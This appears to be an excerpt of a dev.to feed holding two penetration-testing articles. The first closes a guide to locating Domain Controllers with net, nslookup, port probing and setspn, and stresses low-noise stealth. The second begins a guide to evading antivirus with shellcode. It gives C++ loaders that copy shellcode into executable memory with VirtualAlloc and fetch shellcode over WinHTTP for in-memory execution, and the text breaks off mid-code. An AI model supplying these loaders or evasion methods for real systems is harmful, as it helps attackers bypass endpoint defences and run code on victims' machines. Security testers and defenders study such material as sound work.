&lt;p&gt;A Domain Controller can be identified by querying the relevant domain group with the command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net group "Domain controllers" /Domain        //View Domain Controllers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxopac9lio7knaw5tbqig.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxopac9lio7knaw5tbqig.png" alt="Figure 7: Results of the 'net group' command, showing the Domain Controller computer account." width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 7: Results of the 'net group' command, showing the Domain Controller computer account.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Alternatively, the &lt;code&gt;net time&lt;/code&gt; command can be utilised to reveal the Domain Controller serving the logon server role:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net time /do
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F5vktm1hsf94hu8k0wizs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F5vktm1hsf94hu8k0wizs.png" alt="Figure 7: Results of the 'net group' command, showing the Domain Controller computer account." width="800" height="151"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 8: Output showing the domain time, which implicitly reveals the Domain Controller's hostname.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  DNS Record Enumeration
&lt;/h3&gt;

&lt;p&gt;Should the local machine's configured DNS server be a domain-integrated DNS server, querying specific service location (SRV) records can identify Domain Controllers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nslookup -type=all _ldap._tcp.dc._msdcs.tubai.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhm4n8evf145g9ioxfw0t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhm4n8evf145g9ioxfw0t.png" alt="Figure 9: Nslookup query results showing SRV records that point to Domain Controllers." width="800" height="301"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 9: Nslookup query results showing SRV records that point to Domain Controllers.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Port Probing
&lt;/h3&gt;

&lt;p&gt;Domain Controllers typically expose a characteristic set of ports. Port &lt;code&gt;389&lt;/code&gt; is the default port for the Lightweight Directory Access Protocol (LDAP), port &lt;code&gt;636&lt;/code&gt; is for LDAP over SSL/TLS (LDAPS), and port &lt;code&gt;53&lt;/code&gt; is the standard port for the Domain Name System (DNS) service. A targeted scan for hosts within the internal network range that have these specific ports open can reveal potential Domain Controllers.&lt;/p&gt;

&lt;p&gt;A direct probe of the identified Domain Controller's IP address on these key ports confirms its role.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1lgxdkj5znzcr64y1i9u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1lgxdkj5znzcr64y1i9u.png" alt="Figure 10: A port scan confirming that ports 53, 389, and 636 are open on a Domain Controller." width="547" height="388"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 10: A port scan confirming that ports 53, 389, and 636 are open on a Domain Controller.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  SPN Scanning
&lt;/h3&gt;

&lt;p&gt;Service Principal Name (SPN) scanning is a stealthier alternative to conventional TCP or UDP port scanning, as it utilises standard Kerberos authentication requests. Most Windows installations include the native &lt;code&gt;setspn.exe&lt;/code&gt; utility, which does not require administrative rights to perform queries.&lt;/p&gt;

&lt;p&gt;The following command, executed from a domain-joined machine, can identify Domain Controllers by their registered SPNs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;setspn -T tubai.com -Q */*
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Within the scan results, Domain Controllers can be distinguished by canonical names containing the string &lt;code&gt;OU=Domain Controllers&lt;/code&gt;, such as &lt;code&gt;CN=AD-SERVER,OU=Domain Controllers,DC=tubai,DC=com&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqyhl7pnyyzc3j43pyodx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqyhl7pnyyzc3j43pyodx.png" alt="Figure 10: A port scan confirming that ports 53, 389, and 636 are open on a Domain Controller." width="799" height="488"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 11: The output of an SPN scan, with the Domain Controller's service account highlighted.
  &lt;p&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;Numerous methods exist for identifying Domain Administrators and Domain Controllers; the techniques described herein represent only the most frequently employed. During routine internal network penetration tests, it is a cardinal principle to prioritise techniques that generate minimal detectable activity.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>domain</category>
      <category>penetration</category>
      <category>network</category>
    </item>
    <item>
      <title>A Summary of Shellcode Evasion Techniques</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 06:51:10 +0000</pubDate>
      <link>https://dev.to/excalibra/a-summary-of-shellcode-evasion-techniques-4350</link>
      <guid>https://dev.to/excalibra/a-summary-of-shellcode-evasion-techniques-4350</guid>
      <description>&lt;h1&gt;
  
  
  Shellcode Evasion Techniques: A Practical Guide
&lt;/h1&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;I aim to elucidate shellcode evasion techniques in an accessible, straightforward manner, using plain language and practical examples. It is my hope that fellow penetration testers with a background in web application security will also be able to implement these evasion methods effectively.&lt;/p&gt;

&lt;p&gt;In this article, I have categorised shellcode evasion techniques into two primary classifications: &lt;strong&gt;"Separation"&lt;/strong&gt; and &lt;strong&gt;"Obfuscation"&lt;/strong&gt;. These techniques target distinct detection methodologies employed by security solutions, namely signature-based detection, behavioural analysis, and cloud-based heuristic scanning.&lt;/p&gt;

&lt;p&gt;Please note that my expertise is limited; should any errors be identified, I welcome corrections and constructive feedback.&lt;/p&gt;




&lt;h2&gt;
  
  
  0x01 Shellcode "Separation" Evasion
&lt;/h2&gt;

&lt;p&gt;Let us first examine the conventional C/C++ loading methods commonly utilised for shellcode execution.&lt;/p&gt;

&lt;p&gt;Typical approaches include function pointer execution, inline assembly instructions, pseudo-instructions, and similar techniques.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftackmyaw1bzdqvnjefw7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftackmyaw1bzdqvnjefw7.png" alt="Figure 1: Traditional shellcode loading example showing inline shellcode within the executable." width="800" height="343"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 1: Traditional shellcode loading example showing inline shellcode within the executable.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;However, this approach—where the shellcode resides within the same executable file—renders the resulting binary highly susceptible to detection by antivirus solutions.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnhcgctx08jvrn8ima24z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnhcgctx08jvrn8ima24z.png" alt="Figure 2: AV detection results for executables with embedded shellcode" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 2: AV detection results for executables with embedded shellcode
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Consequently, the prevailing philosophy behind separation-based evasion is to decouple the shellcode from the loader program itself.&lt;/p&gt;

&lt;p&gt;Let us examine a common separation-based loading implementation using C++ as an illustrative example:&lt;/p&gt;

&lt;p&gt;A typical implementation employs memory allocation functions such as &lt;code&gt;VirtualAlloc&lt;/code&gt; to execute shellcode:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"windows.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="c1"&gt;// ... shellcode truncated for brevity ...&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x63\x61\x6c\x63\x2e\x65\x78\x65\x00&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;memcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)())&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;)();&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fq25w2lo7sqtbbwq4pjzl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fq25w2lo7sqtbbwq4pjzl.png" alt="Figure 3: Standard shellcode execution flow using VirtualAlloc" width="800" height="631"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 3: Standard shellcode execution flow using VirtualAlloc
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;To achieve true separation, we can retrieve the shellcode from external sources rather than embedding it statically within the binary. This can be accomplished through various means, such as extracting shellcode from text files or downloading it from remote servers.&lt;/p&gt;

&lt;p&gt;The following example demonstrates retrieving shellcode via an HTTP request using the WinHTTP API, storing it in a memory buffer, and subsequently allocating executable memory for execution:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;iostream&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;windows.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;winhttp.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#pragma comment(lib,"winhttp.lib")
#pragma comment(lib,"user32.lib")
&lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwDownloaded&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;LPSTR&lt;/span&gt; &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;HINTERNET&lt;/span&gt;  &lt;span class="n"&gt;hSession&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;hConnect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;hRequest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;BOOL&lt;/span&gt;  &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;hSession&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpOpen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;L"User-Agent"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_ACCESS_TYPE_DEFAULT_PROXY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_PROXY_NAME&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_PROXY_BYPASS&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;hConnect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpConnect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"127.0.0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;INTERNET_DEFAULT_HTTP_PORT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;hRequest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpOpenRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"POST"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"qing.txt"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"HTTP/1.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_REFERER&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_DEFAULT_ACCEPT_TYPES&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;LPCWSTR&lt;/span&gt; &lt;span class="n"&gt;header&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;L"Content-type: application/x-www-form-urlencoded/r/n"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;SIZE_T&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lstrlenW&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;header&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;WinHttpAddRequestHeaders&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;header&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_ADDREQ_FLAG_ADD&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="n"&gt;string&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"name=host&amp;amp;sign=xx11sad"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ss&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;c_str&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpSendRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const_cast&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ss&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bResults&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpReceiveResponse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bResults&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;do&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// Check for available data.&lt;/span&gt;
            &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;WinHttpQueryDataAvailable&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Error %u in WinHttpQueryDataAvailable.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

